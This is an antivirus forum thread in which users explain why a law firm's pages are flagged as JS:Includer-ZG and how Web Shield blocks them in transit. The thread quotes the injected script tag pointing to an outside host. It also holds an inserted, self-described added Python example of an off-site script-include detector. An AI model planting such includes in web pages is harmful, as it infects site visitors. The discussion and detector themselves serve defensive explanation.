Avast WEBforum

Consumer Products => Avast Free Antivirus / Premium Security (legacy Pro Antivirus, Internet Security, Premier) => Topic started by: REDACTED on October 25, 2014, 04:51:58 PM

Title: May it be false positive?
Post by: REDACTED on October 25, 2014, 04:51:58 PM
http://www.pljlawsite.com/html/CrpcXXX.htm
Please replace the XXX above with any number between 160 and 170.
All are infected with JS:Includer-ZG [Trj]. May it be false positive?

Title: Re: May it be false positive?
Post by: Asyn on October 25, 2014, 05:05:59 PM
-> http://sitecheck.sucuri.net/results/www.pljlawsite.com/html/crpc160.htm
Title: Re: May it be false positive?
Post by: Pondus on October 25, 2014, 05:10:45 PM
VirusTotal - html scan
https://www.virustotal.com/nb/file/1cad19bfc19793f3f4c3638bfe072a388574a1b75a3c4d6e65a6bb3e96136594/analysis/

Title: Re: May it be false positive?
Post by: Para-Noid on October 25, 2014, 05:22:56 PM
Suspicious here http://aw-snap.info/file-viewer/?tgt=http%3A%2F%2Fwww.pljlawsite.com%2Fhtml%2Fcrpc160.htm&ref_sel=Google&ua_sel=ff&fs=1

http://zulu.zscaler.com/submission/show/a6d0f6723239796bc47e479b9fba4f9e-1414249907

No, that is not a safe site.
Title: Re: May it be false positive?
Post by: REDACTED on October 26, 2014, 11:23:17 AM
I have already disabled 'Block malware URLs', why is the site in question still being blocked?
Title: Re: May it be false positive?
Post by: Asyn on October 26, 2014, 12:05:28 PM
Because the site is infected.
Title: Re: May it be false positive?
Post by: REDACTED on October 26, 2014, 12:15:46 PM
According to the pop-up message, nothing was downloaded from the site. How did avast know that the site was infected?
Title: Re: May it be false positive?
Post by: Pondus on October 26, 2014, 12:22:40 PM
According to the pop-up message, nothing was downloaded from the site. How did avast know that the site was infected?
Because webshield is scanning the site

and confirmed here
Sucuri report http://sitecheck.sucuri.net/results/www.pljlawsite.com/html/crpc160.htm

VirusTotal - html scan
https://www.virustotal.com/nb/file/1cad19bfc19793f3f4c3638bfe072a388574a1b75a3c4d6e65a6bb3e96136594/analysis/

Title: Re: May it be false positive?
Post by: REDACTED on October 27, 2014, 10:18:52 AM
Because webshield is scanning the site
Do you mean the webpage was scanned when my browser was downloading it?
Title: Re: May it be false positive?
Post by: Pondus on October 27, 2014, 10:41:32 AM
before and blocked.....

Title: Re: May it be false positive?
Post by: REDACTED on October 27, 2014, 10:50:40 AM
Sorry, I don't understand.
Before downloading, the webpage was not yet on my computer, how could avast scan it?
Title: Re: May it be false positive?
Post by: Pondus on October 27, 2014, 11:43:26 AM
http://www.avast.com/faq.php?article=AVKB32#artTitle

Title: Re: May it be false positive?
Post by: polonus on October 27, 2014, 11:56:00 AM
The site also has other problems: https://asafaweb.com/Scan?Url=www.pljlawsite.com%2Fhtml%2Fcrpc160.htm
error and warnings.
Code hiccup: wXw.pljlawsite.com/js/jquery-ui-1.8.14.custom.min.js benign
[nothing detected] (script) wXw.pljlawsite.com/js/jquery-ui-1.8.14.custom.min.js
     status: (referer=www.pljlawsite.com/)saved 31909 bytes 9d62bdd941e9c624fdc05d31c88ccc842383d9e3
     info: [decodingLevel=0] found JavaScript
     error: undefined variable jQuery
     error: undefined variable c.ui
     error: line:1: SyntaxError: missing ; before statement:
          error: line:1: var c.ui = 1;  (remote exploit on bash)
          error: line:1: ....^
     suspicious

@Matthew_Wai,

Whenever avast detects malicious code inside the website it immediately blocks it, so it can never land and open up in your browser and contact your computer, therefore your computer cannot get infested, because it is not allowed to connect to that site.
When avast detects <script src=htxp://fr-cafe.org/vb/chat.php ></script><body lang=EN-US style='tab-interval:.5in'> it alerts, disconnects and you are secure.
To cleanse any remainders of Web Shield contacts and alerts I recommend a full scan of your users file on the computer. This takes a while but should be performed once in a fortnight, at least that is my personal routine.

polonus
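The point Pondus and polonus are making is that the Web Shield sits between the network and the browser and inspects the HTTP response body in transit, so a page carrying an injected script include is blocked before the browser ever parses it. The following is an added example written for this thread, not code from the forum, from Avast, or from the site in question: a small Python model of that in-transit check. It uses one simple heuristic, a <script src=...> pointing at a host other than the site being visited (the shape of the tag polonus quoted), as a stand-in for the product's real signature matching. The hostnames, the sample page and the allow-list are all constructed for the demonstration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit


class ScriptSourceCollector(HTMLParser):
    """Collect the src attribute of every <script> tag, quoted or unquoted."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.sources.append(value.strip())


def offsite_script_includes(html, site_host, allowed_hosts=()):
    """Return script src values that load from a host other than the site itself
    or an explicitly allowed host (e.g. a CDN the site legitimately uses).
    A relative src (no host component) is treated as same-site."""
    parser = ScriptSourceCollector()
    parser.feed(html)
    parser.close()
    site_host = site_host.lower()
    allowed = {h.lower() for h in allowed_hosts} | {site_host}
    flagged = []
    for src in parser.sources:
        host = (urlsplit(src).hostname or site_host).lower()
        if host not in allowed:
            flagged.append(src)
    return flagged


def filter_response(html, site_host, allowed_hosts=()):
    """Model of an in-transit web shield: inspect the response body before it is
    handed to the browser and substitute a block page when something is flagged.
    Returns (allowed, flagged_sources, body_delivered_to_browser)."""
    flagged = offsite_script_includes(html, site_host, allowed_hosts)
    if flagged:
        block_page = ("<html><body>Connection blocked: off-site script include "
                      "detected before the page reached the browser</body></html>")
        return False, flagged, block_page
    return True, [], html


# Constructed sample response: a legitimate same-site script, a CDN script, and an
# injected include sitting outside <head>/<body>, mirroring the shape quoted above.
# All hostnames here are placeholders, not real sites.
SITE_HOST = "www.example-site.test"
SAMPLE_PAGE = """<html><head>
<script src="/js/jquery-ui-1.8.14.custom.min.js"></script>
<script src="//cdn.example/lib.js"></script>
</head>
<script src=http://injected-host.example/vb/chat.php ></script><body lang=EN-US style='tab-interval:.5in'>
<p>Ordinary page text</p></body></html>"""


if __name__ == "__main__":
    ok, flagged, body = filter_response(SAMPLE_PAGE, SITE_HOST, allowed_hosts=("cdn.example",))
    print("delivered to browser:", ok)
    print("flagged includes:", flagged)
```

Without an allow-list the CDN include is flagged too, which is the usual trade-off with a pure host-based heuristic; a product like the Web Shield matches known malicious content instead, so it also catches injected inline scripts and poisoned same-host files that this check cannot see. Either way, the blocked response never reaches the browser, which is why the pop-up reported nothing downloaded: the scan happens on the bytes in transit, not on a file on disk.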
Title: Re: May it be false positive?
Post by: REDACTED on October 29, 2014, 03:16:54 PM
so it can never land and open up in your browser and contact your computer,
Do you mean it cannot land my harddisk?